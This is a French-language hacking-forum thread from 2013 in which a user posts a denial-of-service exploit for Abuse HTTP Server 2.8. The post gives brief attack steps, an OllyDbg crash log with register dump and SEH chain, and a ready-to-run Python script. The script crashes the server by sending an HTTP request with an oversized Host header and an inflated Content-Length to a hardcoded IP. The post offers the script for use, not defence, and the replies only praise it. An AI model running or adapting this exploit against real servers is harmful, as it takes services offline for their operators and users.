FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Abuse HTTP Server 2.8 Denial Of Service Vulnerability

 
Répondre au sujet    FranceHack Index du Forum » Avancé » Exploit Sujet précédent
Sujet suivant
Abuse HTTP Server 2.8 Denial Of Service Vulnerability
Auteur Message
gulgster
Maître hackeur
Maître hackeur

Hors ligne

Inscrit le: 12 Oct 2013
Messages: 101
Localisation: Russia
Masculin Lion (24juil-23aoû)

Message Abuse HTTP Server 2.8 Denial Of Service Vulnerability Répondre en citant
  


comment procéder :
==================
L'attaquand demarre l'exploit dans le DOS MODE (windows)
et il se connecte entre le client et server.

  
Utilisant un debugger : ollydbg :
 
Log data, item 3
 Address=7C8106E9 (crash address)
 Message=New thread with ID 000006D0 created
Log data, item 2
 Message=Thread 000006D0 terminated, exit code 0
Log data, item 1
 Message=Thread 00000794 terminated, exit code CB (203.)
Log data, item 0
 Message=Process terminated, exit code CB (203.)
 
Register FPU log :
 
EAX 00000000
ECX 7C800000 kernel32.7C800000
EDX 7C97B120 ntdll.7C97B120
EBX 00000000
ESP 0012EDD4
EBP 0012EED0
ESI 7C90DE50 ntdll.ZwTerminateProcess
EDI 000000CB
EIP 7C90E4F4 ntdll.KiFastSystemCallRet
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_CLASS_HAS_WINDOWS (00000584)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty - ? FFFF 00FF00FF 00FF00FF
ST1 empty - ? FFFF 00FF00FF 00FF00FF
ST2 empty - ? FFFF 00FE00B2 006E007A
ST3 empty - ? FFFF 00FE00B2 006B0077
ST4 empty -NAN FFFF FFB36B77 FFB36E7A
ST5 empty - ? FFFF 00FF00B3 006B0077
ST6 empty - ? FFFF 00000000 00000000
ST7 empty - ? FFFF 00800080 00800080
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
 
SEH chain of main thread:
 
Address    SE handler
0012FC50   kernel32.7C839AC0
0012FCA8   Abuse.0040D7E3
0012FD78   USER32.7E44048F
0012FDD8   USER32.7E44048F
0012FEF0   USER32.7E44048F
0012FF50   USER32.7E44048F
0012FFE0   kernel32.7C839AC0
  
Et pour déconnecter le client :
======================================
 
#!/usr/bin/python
 
import socket
import os
import sys
 
crash = "0" * 504
 
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer+="Content-Length : 1048580\r\n\r\n"
 
print "[*] Warning use it at yout own risk !"
print "[*] Change some option in code with your self"
print "[*] Connect to host and send payload"
 
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.0.12", 80))
expl.send(buffer)
print "[*] Server Disconected"
expl.close()
 

_________________
High quality of posts.

Dernière édition par gulgster le Lun 21 Oct - 20:07 (2013); édité 1 fois
Lun 21 Oct - 01:13 (2013) Visiter le site web du posteur ICQ AIM Yahoo Messenger MSN GTalk/Jabber Skype
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Lun 21 Oct - 01:13 (2013)
Groscalin
Invité

Hors ligne




Message Abuse HTTP Server 2.8 Denial Of Service Vulnerability Répondre en citant
Chaud chaud chaud !
:O
Première fois que je vois un truc du genre.
Mais, bordel, ou trouves tu tout ça ! xD


Lun 21 Oct - 19:27 (2013)
gulgster
Maître hackeur
Maître hackeur

Hors ligne

Inscrit le: 12 Oct 2013
Messages: 101
Localisation: Russia
Masculin Lion (24juil-23aoû)

Message Abuse HTTP Server 2.8 Denial Of Service Vulnerability Répondre en citant
hahaha ... ;) 

_________________
High quality of posts.

Lun 21 Oct - 19:58 (2013) Visiter le site web du posteur ICQ AIM Yahoo Messenger MSN GTalk/Jabber Skype
Contenu Sponsorisé






Message Abuse HTTP Server 2.8 Denial Of Service Vulnerability

Aujourd’hui à 04:01 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Avancé » Exploit Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com